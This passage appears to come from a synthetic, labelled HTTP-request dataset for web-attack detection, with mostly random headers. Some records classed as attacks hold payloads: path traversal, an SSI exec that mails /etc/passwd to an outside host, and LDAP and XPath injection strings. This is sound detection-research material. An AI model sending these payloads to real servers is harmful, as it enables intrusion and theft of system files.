Date: Sat, 19 Apr 08 19:48:13 UTC
ETag: W/"NKbJpRBfD618sorWh"
Expect: 100-continue
From: sBno@sanbCa.biz
If-Modified-Since: Sat, 15 Mar 08 04:57:14 CET
If-Unmodified-Since: Sat, 19 Jul 08 22:49:18 GMT
If-Match: "iIG5oLfLyYoo1DN"
If-None-Match: *
Max-Forwards: 077
MIME-Version: 4.8
Pragma: n86ooadm='ltenNoe'
Authorization: Basic b3JYdWw6ZUVldHNhdA==
Referer: /Asnttban/2reeSy/pi9rorzy/Hwsnpah.mpg
TE: deflate,deflate,trailers
User-Agent: ..\..\..\..\WINDOWS\system.ini
UA-Pixels: 030x7263
Via: 5.4 www.oget4.js, 9.1 www.owbiaoei.shtml
Transfer-Encoding: gzip
Warning: 960 www.u6dcsotn.jpeg "hCaie7" "Sun, 26 Jul 09 22:27:22 GMT"
X-Serial-Number: 9846651700597981
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35964
Start - Id: 44824
class: PathTransversal
GET /ilibAo2Bgnin4/eOkXNH3EcR@c/nr1N/pusrXobjectXrj.cfm?eftleh=cKvxaR2b&CcianFs=htlzee5ejm9&uotzea0pt=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&euw3daer4ie=He&ncNil8D56teit55=CearOpHc7tm&gaarsrlaosrgFr=D%2Basmeap%3D%3Dt%29mochattda&w3srRpnhcriOrdn=%26o&byseFdn805ryo6T=pe0itihwpositionddt%26te&passwdI8X8NK4v@varC=06931038 HTTP/1.1
Host: 9.117.91.176
Connection: fgaiymc
Accept: */*
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: compress;q=0.8
Accept-Language: trr-t7lhr1ie;q=0.4, epwEch-te, ike52j-facya
Cache-Control: max-age=71760
Client-ip: 92.163.213.217
Cookie: eb93urdui=gh3;imqql=ncysLmb0V
Cookie2: $Version="23"
Date: Mon, 24 May 04 01:06:17 GMT
ETag: W/"45NPbgutQsMuP7R"
Expect: fe2mogt=5hrhhao
From: ecsie0r@aat1r.com
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Thu, 26 Feb 09 05:01:22 CET
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "grIOzWd4mODJSc-sGhxE"
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 3
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: /iqta1/aeaoad/heeiiwl/nelS22h.sh
TE: gzip
Trailer: If-Range
User-Agent: nnetVhw/3.1.8
UA-CPU: MIPS
UA-Disp: 5327,238,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/8.2 www.feet9sc.js, 1.1 www.ieoBerho.html
Transfer-Encoding: niet; toiedssh=eyswno
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44824
Start - Id: 24727
class: Valid
GET /ahehndeaia8reos/d2afahipreyndveol/5cbejeaq8z/lchhosYR9yS/hwr/iLNByqgZ/tnn5buStdipPomk6rrkA/-lRaC/Tcfnt/n7eeq0ngceqeuqso/QdaonFetshdaea/mM.php3?Q02dropW_NxC=rsoicea HTTP/1.1
Host: www.feaaan8pei.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: y-ge4c, Ivset-stoim;q=0.3, tts0hnn-4onI81, 2d-mrac
Cache-Control: no-cache
Client-ip: 242.88.120.95
Cookie: rE2la88auie6wha=enh=i;tt3ltzarm=script;mrucDaiseoh5m=861;_Jdb=1henataam/n
Cookie2: $Version="732"
Date: Sun, 12 Feb 06 11:04:21 CET
ETag: W/"rT_2qatuZEWsIh0Ss"
Expect: Lfhs7
From: 4Pioe@levcc.org
If-Modified-Since: Thu, 28 Aug 08 10:28:13 CET
If-Unmodified-Since: Mon, 17 Aug 09 05:15:27 GMT
If-Match: "pkxp_4ReWsRw4pPZKCh"
If-None-Match: *
If-Range: Fri, 12 Oct 07 22:27:57 UTC
Max-Forwards: 76
MIME-Version: 5.8
Pragma: hondde=a1w0w
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: ssmgi5 edLnth=tll2
Range: 991-
Referer: /odhqei/sdzOl/eoht/4bc8wgi/thtach.exe
TE: gzip;q=0.0,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: igVrNd5pfb http://www.ySsideE.de
UA-CPU: PowerPC
UA-Disp: 423,3008,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 7.8 www.ys0o.css, FTP/1.4 www.amovc.js
Transfer-Encoding: bhcai
Upgrade: g8mn/1.2, BihP/1.3, isA/2.4, gnpI/4.1
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 22326900137086
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24727
Start - Id: 33898
class: Valid
PUT /gM/bXOM5W/DtwAskBcTU/tK/pcun/qi/bDvTlvCIb0B.php? HTTP/1.0
Content-Length: 166
Content-Language: 3n9ocnli
Content-Encoding: gzip
Content-Location: http://TcoJt4.net/dhnn/enQnj.mdb
Content-MD5: ZWx1cmlzbGllN2lkc2xlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 May 06 18:13:59 GMT
Last-Modified: Sat, 24 Dec 05 19:09:13 CET
Host: www.9c4f.net
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-greek, windows-1254, iso-8859-8-i;q=0.9, iso-8859-4
Accept-Encoding: compress;q=0.2, compress, gzip;q=0.3
Accept-Language: 2cdnstes-pq;q=0.6, fcww1o-h4tgaCh;q=0.5, siiNx-n;q=0.1
Cache-Control: max-stale=21
Client-ip: 68.59.175.92
Cookie: yickTwrt1mbre=>whererboot.ini;CJJOcj9o=9w
Cookie2: $Version="187"
Date: Fri, 06 Apr 07 18:03:58 CET
ETag: "yty6mQFBlm2dqjw"
Expect: ieb2qasi=Otwexie9;htae4ao
From: tietc@t0ytt.net
If-Modified-Since: Mon, 14 Aug 06 14:35:28 UTC
If-Unmodified-Since: Tue, 15 Sep 09 02:58:27 GMT
If-Match: "YZG5NQN5IHbKfFmLmSGb"
If-None-Match: "n4sbpKK9a1WHwdSNV7h"
If-Range: Sun, 28 May 06 20:03:10 CET
Max-Forwards: 3
MIME-Version: 1.6
Pragma: rn=jInb
Proxy-Authorization: Digest username="3htdpnp1"
Authorization: hCsu toftpss=rdgor8
Range: 254982-39
Referer: /veom/h6escp/neineito.jpeg
TE: trailers,trailers
Trailer: Warning
User-Agent: asc0nS (e9uQD4; io7hRx1Gc; rghr_I5I)
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1982x002
Via: HTTP/8.9 www.ey8esl.shtml
Transfer-Encoding: scau2
Upgrade: ict/4.3, tseu/9.1, eolz/4.5, eeiuje/9.5
Warning: 650 www.SRhlh0nf.jpeg "naorss8mXmrab" "Sat, 28 Mar 09 21:13:32 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 6132370347859311136
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

Siecboejshris=3794169&BTYgZ_ClPYL=b&oztbrdbiaa=os8xKT28n&eaetbnh4ihr=2&uUietomtIio0q=7665&Yndd=6719&Owp-tzmX5Xhk=172&o9Da4edewuw=zLincamon@clinkmdH&ndtshaHldir1S=at

End - Id: 33898
Start - Id: 30431
class: Valid
GET /0VgSSunionH.c_oSmk.aspx?PUTif=0e+&Tixebha4s3=082054011 HTTP/1.0
Host: www.s2zonqaR.gov
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-roman;q=0.1, windows-1252, iso-8859-8-i;q=0.6, windows-1258, iso-8859-15;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: SOu7gsbi='orpY'
Client-ip: 222.100.187.30
Cookie: rwaosTdis=79;ntjse8vc=0m-;qlra=3
Cookie2: $Version="2"
Date: Sat, 25 Jun 05 21:01:04 GMT
ETag: "qxgtxQ_CE8Y_iDs60"
Expect: 100-continue
From: ppassat@m2mrs6.ch
If-Modified-Since: Wed, 10 Feb 10 10:24:36 CET
If-Unmodified-Since: Sat, 17 Nov 07 14:29:38 UTC
If-Match: *
If-None-Match: "lflxPY-Ex7Ya4Hwg3"
If-Range: Fri, 16 Dec 05 21:34:49 CET
Max-Forwards: 21
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: nytrr hppmt=esdb
Authorization: NTLM ZHhwQm52YW5yZmlzZTRON1RkNW5jaThIaGc1aTV2bnRpYWU0b0gzbmRobXVy
Referer: http://euprlodJ.fr/pes5/ceuno6/tnndt/tSena/inter1.php4
TE: gzip
Trailer: Pragma
User-Agent: rtiun/2.0.6.4.5
UA-CPU: PowerPC
UA-Disp: 875,388,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x400
Via: 2.6 www.ipmear.html, eeenr/0.3 51.130.43.4
Transfer-Encoding: deflate
Upgrade: ateie/8.9, w2the/1.3, eivOe/3.4
Warning: 485 87.113.145.16 "tapaxhedta" 
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 17997505261977757757
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30431
Start - Id: 40761
class: SSI
PUT /O0dO1GineqbinylZzp/s.Tv4JVtXtOcJ/n3dt4eKbY/fhCezgjlAaa2iseuuh/nX82jAhk/fxDySDgn2p/aqaha2hawoEn/2afZbdIpncv0i-z@eTT.swf? HTTP/1.0
Content-Length: 400
Content-Language: daomebb
Content-Encoding: deflate
Content-Location: http://spff.net/ic5trxea/sal3/tRmiepg.bin
Content-MD5: c0xpaWJlZ2VpbEl1aW9Ocw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Feb 04 12:58:49 CET
Last-Modified: Mon, 29 Jun 09 05:43:41 GMT
Host: 129.141.97.162:75
Connection: close
Accept: image/gif
Accept-Charset: x-mac-japanese;q=0.8, windows-1254;q=0.5, iso-8859-8-i, windows-1250;q=0.2, shift_jis;q=0.0
Accept-Encoding: compress;q=0.6, gzip
Accept-Language: iiqdbl-3, ti-alFQam, ene-e;q=0.9, 9-dedn;q=0.8
Cache-Control: max-stale=3
Client-ip: 166.41.33.129
Cookie: ipe9Jm3=112815;NZn=pmeiss;Aeernepfae=tdsbajv2Dd 
Cookie2: $Version="570"
Date: Wed, 25 Nov 09 21:25:24 UTC
ETag: W/"FsK6X9uau3JVBqU"
Expect: rmaeE=isllts;rfnemmn
From: alirg@hnsnaSx.uk
If-Modified-Since: Mon, 05 Jun 06 19:40:09 UTC
If-Unmodified-Since: Mon, 16 Jun 08 06:56:32 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Jun 08 04:27:01 UTC
Max-Forwards: 797
MIME-Version: 8.0
Pragma: a=rwagdaok
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Digest username="etfji"
Range: 21211-
Referer: /ishw5or4/stanA/sshr.txt
TE: trailers,chunked;q=0.4
Trailer: Connection
User-Agent: Mozilla/2.6 (Windows; U; WinNT 6.4; ie-ey; rv:0.5.6) Gecko/89542795
UA-CPU: MIPS
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 3.3 52.26.160.47:7, 8.3 www.icuTqst.shtml, 6.4 www.IbuaLe.css
Transfer-Encoding: compress
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

g2@x4ZGTLC7=072598&BXgwB=tiy&TdnRewobrd=nea0m&al4hdori=<!--  #odbc  statement =    "select    eaoI,   osoe,     hwslht  from    pSaosarp order  by   1, 16,    0"    -->&nce=57522&eeEB5EyalrIuq=eXhwn4wNy&eififjueetrm=oIPUe)o6&giupontprnnads=3734535&tbGUOEcposition=mu s69rimg-trpobjecto4a&08xe=dtautoexec&cMlreplaceVxmlls-HeV=988300&e2lesE0in=ir3AeendAhoy&8fahAdsogdebllr=eaG8R

End - Id: 40761
Start - Id: 24050
class: Valid
GET /7SZGPd4YIGP.png?hni=dz5bZc2kSVc&6f9Esia=093842&RQMxu-O=yolgrall%27ot6+a&dnk7st2crw9H=e%2F&jrsMy=+&epanoel=op%3EhR HTTP/1.0
Host: 56.100.165.144
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.6, windows-1251;q=0.7, cp-932;q=0.7, utf-8, iso-8859-1
Accept-Encoding: *;q=0.7
Accept-Language: E-h;q=0.5, m4uh-yf6iat, h-notgi;q=0.4, T9-inTh
Cache-Control: no-cache
Client-ip: 88.212.87.151
Cookie: -np%upasswdSUWoA8bin=idnpss;tae=54958
Cookie2: $Version="342"
Date: Mon, 31 Jan 05 12:58:16 UTC
ETag: W/"2l6XQ1FDpk7ogdZzlP"
Expect: 100-continue
From: fewUg9v0@yntowDa.org
If-Modified-Since: Sun, 30 Mar 08 22:31:10 CET
If-Unmodified-Since: Fri, 29 Sep 06 22:11:48 UTC
If-Match: ".Cku32E6bt8wT7uULKC"
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: NTLM ZTRwOGFwZXV1ZWRnZXdhYXZvdzJpc1VnNmc4RXRldHQ=
Range: 537-243504,313-,96328-45
Referer: http://www.emxfea5.biz/ieryjrne/ftJ3/vIiaHtf.html
TE: trailers,deflate;q=0.1,trailers
Trailer: Range
User-Agent: Mozilla/9.9 (compatible; fusmtleNr; Unix; 2eotohia; 0nnInawR; wmdAAlnrl)
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: nsmA/7.8 www.vnouas.css, HTTP/7.9 www.eYyta.jpeg, pct3/7.6 www.3itft.shtml
Transfer-Encoding: identity
Upgrade: cUYte/7.0, Lbem/8.5, drnfie/8.0, np54/2.3, taoeT/3.0
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 240.187.200.43
X-Serial-Number: 4272941
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24050
Start - Id: 29475
class: Valid
GET /toc2m/s7._zatAOyzFHttrj/2obnx6tedne/uoe0sEmw6ifme/reAidb/tltdttirxonm/zPJpZIQTfQ7FrqovV/uUIQS1a2G.aspx?ohEsrt5sratt=095113963&hs3hvnR0ni=n1uq-nO2nQ3&nwuiae=i%40vfWGwbh&1SV0la=E%7E+v&aienbbn=aoiNdlzmIi0te5 HTTP/1.1
Host: www.1Atr.fr:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8-r, ks_c_5601-1987, iso-2022-kr, iso-8859-8-i, iso-8859-5
Accept-Encoding: 
Accept-Language: aeh4f-troharg;q=0.0, 5rs7-9En, lsi-eoPtbc
Cache-Control: no-cache
Client-ip: 192.98.53.247
Cookie: pt0ny1dttlwfaaa=8650754
Cookie2: $Version="749"
Date: Mon, 23 Mar 09 23:34:38 CET
ETag: "xLrsNsTOPTUionq"
Expect: 100-continue
From: 3eefJz@tepiieo.org
If-Modified-Since: Tue, 15 Jan 08 23:38:38 UTC
If-Unmodified-Since: Fri, 10 Dec 04 17:15:37 GMT
If-Match: *
If-None-Match: "h8BcWed5v.4lSORDYe"
If-Range: Fri, 14 Dec 07 05:17:31 CET
Max-Forwards: 83
MIME-Version: 7.2
Pragma: bueonbal=shaavide
Proxy-Authorization: gAce Eitt8eae=elt3
Authorization: Digest nonce
Range: 6551-
Referer: /poof/1ghond/u0lare.asp
TE: trailers
Trailer: Connection
User-Agent: Mozilla/1.7 (Windows; U; WinNT 0.6; 1h-sa; rv:4.0.8) Gecko/13505218
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 412x970
Via: 3.7 90.50.190.74
Transfer-Encoding: compress
Upgrade: nene/2.6
Warning: 434 www.3rmtd.png "yvs9tz" "Fri, 05 Aug 05 19:35:36 GMT"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29475
Start - Id: 39910
class: SSI
PUT /dt4Emyrhh/2rtetghel4es8eets/iZAQNGtLPOpfZ3hTyJ/lD4/tln/snbvdG/gk99EKTg/onqiqiae/mvoN/eC_IIEPi8jPPPKDLSHe/o2YiXMUomMv-yBqcqvq/cLMvhl8NYln3Otgih.cgi? HTTP/1.0
Content-Length: 315
Content-Language: 6rbdex,tq4t,ntV
Content-Encoding: deflate
Content-Location: /hinu1i.asmx
Content-MD5: cmZlamhMdWllM3VtbGxuYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Tue, 19 Jul 05 03:53:07 UTC
Host: 187.235.127.222:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.3, x-mac-korean;q=0.7, shift_jis;q=0.9, iso-8859-2, cp-936;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 239.36.31.16
Cookie: b1p=bo
Cookie2: $Version="47"
Date: Mon, 07 May 07 19:11:38 CET
ETag: W/"KujfBaJYEnNh-svZHP"
Expect: cs2a2eya
From: etiwhOvt@03yWr.net
If-Modified-Since: Sun, 07 Aug 05 23:25:03 CET
If-Unmodified-Since: Sun, 19 Apr 09 07:34:41 GMT
If-Match: "vJjBK.Qx7jaij4qsS"
If-None-Match: *
If-Range: "Xedi0o0y5rPO_S_4"
Max-Forwards: 984
Pragma: eolsfe='o8Ed'
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Digest cnonce="DmWeetx"
Referer: /qatae/oe5sowvh/nueb.mpg
TE: trailers,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/5.6 (X11; U; Unix 4.0; ie-ge; rv:1.8.2) Gecko/99532881
UA-OS: Win9x
Via: HTTP/5.8 161.47.96.155
Transfer-Encoding: deflate
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Serial-Number: 430786884231
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

tqR8fneeoh=wX6.j&r9oet=oiohhhdfnsApsea&mogasHit1=0546001&lougaanoolwhs=9&lt4irmodxezd=%3C%21--+++%23exec+++cmd%3D%22%2Fbin%2Fmail++++Cxr.com+%3C+++%2Fetc%2Fpasswd%22--%3E&iofOeeauEtltrij=e&oaEienu=%24ne%3D&gmMnklink%uzcat=eUe9&eetedsi9e=8&QetcF3httpg7iall@V=9&aE=tii&LIm5hHaetmix=sesRot&Htadswg=eutSe%26icopyrcisrLw

End - Id: 39910
Start - Id: 36905
class: LdapInjection
POST /0AEscripty4KCCI@2L0/cPu0hrssst/egesg1tOa/IpA/cceAatdeimbha/0yRG3p/nuochscmyusv/lrlhws_ITH1/wT6j0JJTgyhOWpcD.jsp? HTTP/1.1
Content-Length: 264
Content-Language: aX
Content-Encoding: gzip
Content-Location: http://www.srlju2eD.cz/oehardcm/roi3caj/nraeedpm/0R3eswo.exe
Content-MD5: aWZoaWVmc3ZhaTdvWWE5aA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Aug 08 05:03:37 CET
Last-Modified: Sat, 18 Nov 06 12:09:08 UTC
Host: www.8jh3p.it:80
Connection: thyd
Accept: audio/x-wav;q=0.4, text/*
Accept-Charset: x-mac-icelandic;q=0.9, x-mac-roman, iso-8859-2;q=0.6
Accept-Encoding: identity;q=0.6, identity, identity;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 16.173.236.24
Cookie: drsiaocnhn=connect;nEtalNe=tBopte>a;W@5phpupr=1;l9stdinPbaG0=2iEhc4
Date: Sat, 10 Nov 07 16:45:05 UTC
ETag: "xPaZn8bGGwCMl.Xl"
Expect: otthrv
If-Modified-Since: Tue, 13 May 08 09:27:42 UTC
If-Match: *
If-Range: *
Max-Forwards: 31
MIME-Version: 7.4
Pragma: asM=tooe
Proxy-Authorization: Basic dTJlaTplcjNyY0hv
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Range: 03-
Referer: /s1Lct8/isnsf/eqhlIwv/xe1hh.png
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 2.3; df-kt; rv:7.1.7) Gecko/62807816
UA-OS: Win98
Via: 1.9 39.111.132.232
Transfer-Encoding: identity
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 128 59.175.65.205 "atelalsoarn" 

hqsyc4hhHEs=40)(&(objectClass=oc4h)(|(sn =    ure)(cn=ibe    J*))&xeirt= ~i2&T18PXI=ejxar <ntcamcat&ht=l~&awlmi2aees=ymo(zenbibct=&ngm4pyipetnym=224295&awdieooeebrE=33251&ieiQegwiu=521150&c7th8hiesWlL=gechoen&wa9ttn=iure8s d

End - Id: 36905
Start - Id: 28212
class: Valid
GET /avis/wt9slwuaf4sue.msf?eurhnngsth0e=ovn7&wtepuoc=5vVpS&VOd2JD3=gimTdnocesemernt&n-.lEPrmcmdx=nola&sedc=sla5&9irNmvchtstesia=2686&t7=tenydsb%3BsE%26dtdf&loxQomk5=94340&wshmawia372=pstY HTTP/1.1
Host: 183.28.90.41
Connection: 6ea8fea
Accept: application/postscript
Accept-Charset: windows-1255, macintosh;q=0.9, iso-8859-9;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: remHsl-eVei;q=0.6, seaTio-a;q=0.7, dlegraoD-rawmi;q=0.4, TMoyrr-a, Ie-e;q=0.8
Cache-Control: no-store
Client-ip: 42.136.51.18
Cookie: mLebmYxminsertYi=sX48R09NbskU;staceeiail1c5t=elU6u;desAextiotna3u=oCeafuoflHhpocl;document_TEFs59_G=4;_8EQlikeAN=4454268;szatiioa1eost=88
Cookie2: $Version="1"
Date: Sat, 27 Nov 04 20:41:58 GMT
ETag: W/"AOBMRVCVeTtnaEGt-O"
Expect: 100-continue
From: ldbonaa@rtlruedpi.uk
If-Modified-Since: Thu, 28 Dec 06 21:46:12 GMT
If-Unmodified-Since: Thu, 13 Oct 05 16:44:00 CET
If-Match: *
If-None-Match: "m5yX7-9Lg2WmJlooCVw"
If-Range: *
Max-Forwards: 4059
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="lesgG"
Authorization: efutar tsle=uaasysEs
Range: -569,-376,5-
Referer: http://www.8ona.net/riiOR/eioqnftC/dpotli1.mpg
TE: gzip,gzip;q=0.4
Trailer: Accept
User-Agent: nrcdpaHaabaP7
UA-CPU: MIPS
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1230x5831
Via: FTP/4.3 76.99.66.52
Transfer-Encoding: gzip
Upgrade: Tsis/9.8
Warning: 776 108.16.131.195 "ielaue4Iaenoncleslf" "Mon, 18 Feb 08 07:26:55 CET"
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 1882318101295
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28212
Start - Id: 17644
class: Valid
GET /sQIT7qkgbNg-Fk9W/TDRcDzYVWiv6N/wdlomn/VdivBwwy70@/ymlnlirc.gif?am=dfih HTTP/1.1
Host: 78.32.81.175:89
Connection: istaetn
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 149.12.215.3
Cookie: 7cro=-Rdr|kescriptexecmu4ert
Cookie2: $Version="1"
Date: Tue, 15 May 07 18:31:54 CET
ETag: "s-gNiks6Lw78EgxIbZn"
Expect: 100-continue
From: spzl@sWeElsewt.de
If-Modified-Since: Sun, 25 Jan 04 19:05:43 GMT
If-Unmodified-Since: Thu, 14 Jul 05 12:11:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 10
MIME-Version: 8.1
Pragma: iw='tl'
Proxy-Authorization: NTLM YXBsZ2N0Z0RuYjFzbnRvUmd0YXJsbnQ4dHN0cnNodHVXZXQwZWVpZWV1aWQ=
Authorization: Basic c3Rmcjp5Y3N0cnhh
Range: 513554-,580948-54482,762083-
Referer: http://y1laatle.gov/aaguno/t1jIi/5pean/s0dopub/xi7eita.mpeg
TE: trailers,trailers,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/1.7 (X11; U; Unix 9.8; tN-Mh; rv:1.2.5) Gecko/79955012
UA-CPU: Sparc
UA-Disp: 004,3622,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 813x197
Via: HTTP/5.1 70.189.231.6, Eesy/2.6 104.250.134.235
Transfer-Encoding: identity
Upgrade: teb/8.3, eos/8.4
Warning: 768 www.lonce.jpg:6617 "rDn7td" "Mon, 09 Feb 09 19:00:46 GMT"
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17644
Start - Id: 49831
class: XPathInjection
GET /nH9lZqwZi0Zy/cdS.gif?auhapitsfi=elwDh98g9&5tPqpacceptwR=acceptde+oiistYinsert&Ygenntra0saHca=tVls7mdoatysehs&eQsWFrJl4=otrzaI%27+or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i++%2B++++j++%2B++k++++%2Bl++++%2B+1%29%5D++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27eevser%27++%3D%27++pt%27++or&uoieee9=691335&jclh=1651754&CyVB=8088294&ieoabhmmoiqsn=thjhupuhex&rTei=b+ex%3AOoag HTTP/1.0
Host: www.eeoilXth.it
Connection: close
Accept: application/*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: ON-ry;q=0.3
Cache-Control: only-if-cached
Client-ip: 77.69.248.51
Cookie: 0sibelidrr=A8;3sittzGIYVx=ossen;btleRisinclibg=32
Cookie2: $Version="7"
Date: Fri, 23 Jun 06 01:20:11 CET
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sat, 20 Dec 08 20:02:48 CET
If-Unmodified-Since: Tue, 27 Jan 09 09:02:40 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Apr 10 07:25:47 GMT
Max-Forwards: 7
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Basic bW5yb25uNzplT2VkdGg=
Range: -16,498057-,69-3
Referer: /5sit/llrtA99/sbwhe/svyInuoh/njnltg.mpg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.8 (compatible; ynnaen; Win98; hpi9; n1d0n5)
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 172x6984
Via: meZ/5.9 www.reeirinz.htm:4
Transfer-Encoding: identity
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49831
Start - Id: 4518
class: Valid
POST /wex/icGnPshNE/2p/U5A9DrdMNWS.exe? HTTP/1.1
Content-Length: 249
Content-Language: rfseeaeh
Content-Encoding: gzip
Content-Location: /ilcwhv/dvLhadi.cgi
Content-MD5: bnRiYkRseGNvZXZyb2lvTQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Jan 08 05:51:05 CET
Last-Modified: Sun, 09 Jul 06 04:24:40 UTC
Host: 208.251.37.70:80
Connection: close
Accept: application/*, text/*, audio/*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: pe=nhubro
Client-ip: 122.116.121.13
Cookie: ss=082;o6rr4slmtemIip=t9was;rcpxst.=3406;8SSbinAR=rDJJut_
Cookie2: $Version="544"
Date: Sat, 29 Jan 05 21:04:32 GMT
ETag: W/"OlJb9sb29WYnZcfKn"
Expect: 100-continue
From: no4getv@2octe1.cz
If-Modified-Since: Tue, 23 Mar 10 21:22:09 GMT
If-Unmodified-Since: Tue, 15 Mar 05 01:51:04 UTC
If-Match: "V0TRWSs.NwnusJq"
If-None-Match: *
If-Range: Wed, 23 Dec 09 11:37:44 UTC
Max-Forwards: 64
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: d6nso iofjtqph=imodlsXg
